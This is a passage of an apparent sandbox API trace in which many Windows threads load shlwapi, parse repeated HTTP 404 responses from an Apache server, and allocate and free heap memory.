dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0217.256] GetProcessHeap () returned 0x690000 [0217.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 198 os_tid = 0xed4 [0217.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.424] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.424] GetProcessHeap () returned 0x690000 [0217.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0217.424] GetProcessHeap () returned 0x690000 [0217.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0217.424] GetProcessHeap () returned 0x690000 [0217.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 199 os_tid = 0xc1c [0217.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.625] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.631] GetProcessHeap () returned 0x690000 [0217.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0217.632] GetProcessHeap () returned 0x690000 [0217.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0217.632] GetProcessHeap () returned 0x690000 [0217.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 200 os_tid = 0xd08 [0218.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0218.332] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.332] GetProcessHeap () returned 0x690000 [0218.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0218.333] GetProcessHeap () returned 0x690000 [0218.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0218.333] GetProcessHeap () returned 0x690000 [0218.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 201 os_tid = 0xcd8 [0219.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0219.218] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.218] GetProcessHeap () returned 0x690000 [0219.218] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0219.218] GetProcessHeap () returned 0x690000 [0219.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0219.218] GetProcessHeap () returned 0x690000 [0219.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 202 os_tid = 0xb94 [0220.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.548] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.548] GetProcessHeap () returned 0x690000 [0220.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0220.548] GetProcessHeap () returned 0x690000 [0220.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0220.548] GetProcessHeap () returned 0x690000 [0220.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 203 os_tid = 0x1338 [0220.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0220.977] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.977] GetProcessHeap () returned 0x690000 [0220.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0220.977] GetProcessHeap () returned 0x690000 [0220.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0220.977] GetProcessHeap () returned 0x690000 [0220.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 204 os_tid = 0x970 [0221.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.143] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.143] GetProcessHeap () returned 0x690000 [0221.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0221.143] GetProcessHeap () returned 0x690000 [0221.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0221.143] GetProcessHeap () returned 0x690000 [0221.143] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 205 os_tid = 0x88c [0221.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.394] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.394] GetProcessHeap () returned 0x690000 [0221.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0221.394] GetProcessHeap () returned 0x690000 [0221.394] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0221.394] GetProcessHeap () returned 0x690000 [0221.394] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 206 os_tid = 0x4fc [0221.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.583] GetProcessHeap () returned 0x690000 [0221.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0221.583] GetProcessHeap () returned 0x690000 [0221.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0221.583] GetProcessHeap () returned 0x690000 [0221.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 207 os_tid = 0xf54 [0221.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.781] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.781] GetProcessHeap () returned 0x690000 [0221.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0221.781] GetProcessHeap () returned 0x690000 [0221.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0221.781] GetProcessHeap () returned 0x690000 [0221.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 208 os_tid = 0xffc [0221.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.999] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.999] GetProcessHeap () returned 0x690000 [0221.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0221.999] GetProcessHeap () returned 0x690000 [0221.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0221.999] GetProcessHeap () returned 0x690000 [0222.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 209 os_tid = 0x510 [0222.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.263] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.263] GetProcessHeap () returned 0x690000 [0222.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0222.263] GetProcessHeap () returned 0x690000 [0222.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0222.263] GetProcessHeap () returned 0x690000 [0222.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 210 os_tid = 0xe84 [0222.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.455] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.455] GetProcessHeap () returned 0x690000 [0222.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0222.455] GetProcessHeap () returned 0x690000 [0222.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0222.455] GetProcessHeap () returned 0x690000 [0222.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 211 os_tid = 0xea0 [0222.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.677] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.677] GetProcessHeap () returned 0x690000 [0222.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0222.677] GetProcessHeap () returned 0x690000 [0222.677] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0222.677] GetProcessHeap () returned 0x690000 [0222.678] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 212 os_tid = 0xd4c [0222.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.899] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.899] GetProcessHeap () returned 0x690000 [0222.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0222.899] GetProcessHeap () returned 0x690000 [0222.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0222.899] GetProcessHeap () returned 0x690000 [0222.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 213 os_tid = 0xf20 [0223.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.179] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.179] GetProcessHeap () returned 0x690000 [0223.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0223.179] GetProcessHeap () returned 0x690000 [0223.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0223.179] GetProcessHeap () returned 0x690000 [0223.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 214 os_tid = 0x880 [0223.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.397] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.397] GetProcessHeap () returned 0x690000 [0223.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0223.397] GetProcessHeap () returned 0x690000 [0223.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0223.397] GetProcessHeap () returned 0x690000 [0223.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 215 os_tid = 0x918 [0223.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.552] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.552] GetProcessHeap () returned 0x690000 [0223.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0223.552] GetProcessHeap () returned 0x690000 [0223.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0223.552] GetProcessHeap () returned 0x690000 [0223.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 216 os_tid = 0x948 [0223.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.748] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.748] GetProcessHeap () returned 0x690000 [0223.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0223.748] GetProcessHeap () returned 0x690000 [0223.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0223.748] GetProcessHeap () returned 0x690000 [0223.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 217 os_tid = 0x2f0 [0223.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.937] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.937] GetProcessHeap () returned 0x690000 [0223.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0223.937] GetProcessHeap () returned 0x690000 [0223.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0223.937] GetProcessHeap () returned 0x690000 [0223.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 218 os_tid = 0x310 [0224.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.281] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.281] GetProcessHeap () returned 0x690000 [0224.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0224.281] GetProcessHeap () returned 0x690000 [0224.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0224.281] GetProcessHeap () returned 0x690000 [0224.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 219 os_tid = 0x1324 [0224.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.421] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.421] GetProcessHeap () returned 0x690000 [0224.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0224.421] GetProcessHeap () returned 0x690000 [0224.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0224.421] GetProcessHeap () returned 0x690000 [0224.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 220 os_tid = 0xae0 [0224.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.632] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.632] GetProcessHeap () returned 0x690000 [0224.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0224.632] GetProcessHeap () returned 0x690000 [0224.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0224.632] GetProcessHeap () returned 0x690000 [0224.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 221 os_tid = 0xe60 [0225.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.042] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.042] GetProcessHeap () returned 0x690000 [0225.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0225.042] GetProcessHeap () returned 0x690000 [0225.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0225.042] GetProcessHeap () returned 0x690000 [0225.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 222 os_tid = 0x61c [0225.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.854] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0225.854] GetProcessHeap () returned 0x690000 [0225.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0225.854] GetProcessHeap () returned 0x690000 [0225.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0225.855] GetProcessHeap () returned 0x690000 [0225.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 223 os_tid = 0xd10 [0226.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.201] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.201] GetProcessHeap () returned 0x690000 [0226.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0226.201] GetProcessHeap () returned 0x690000 [0226.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0226.201] GetProcessHeap () returned 0x690000 [0226.202] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 224 os_tid = 0xcb0 [0226.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.463] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.463] GetProcessHeap () returned 0x690000 [0226.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0226.463] GetProcessHeap () returned 0x690000 [0226.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0226.464] GetProcessHeap () returned 0x690000 [0226.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 225 os_tid = 0x418 [0226.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0226.832] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.832] GetProcessHeap () returned 0x690000 [0226.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0226.832] GetProcessHeap () returned 0x690000 [0226.832] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0226.832] GetProcessHeap () returned 0x690000 [0226.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 226 os_tid = 0x3b0 [0227.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0227.398] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0227.398] GetProcessHeap () returned 0x690000 [0227.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0227.398] GetProcessHeap () returned 0x690000 [0227.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0227.398] GetProcessHeap () returned 0x690000 [0227.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 227 os_tid = 0xd5c [0228.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.017] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.017] GetProcessHeap () returned 0x690000 [0228.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0228.018] GetProcessHeap () returned 0x690000 [0228.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0228.018] GetProcessHeap () returned 0x690000 [0228.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 228 os_tid = 0xc90 [0228.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.212] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.212] GetProcessHeap () returned 0x690000 [0228.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0228.212] GetProcessHeap () 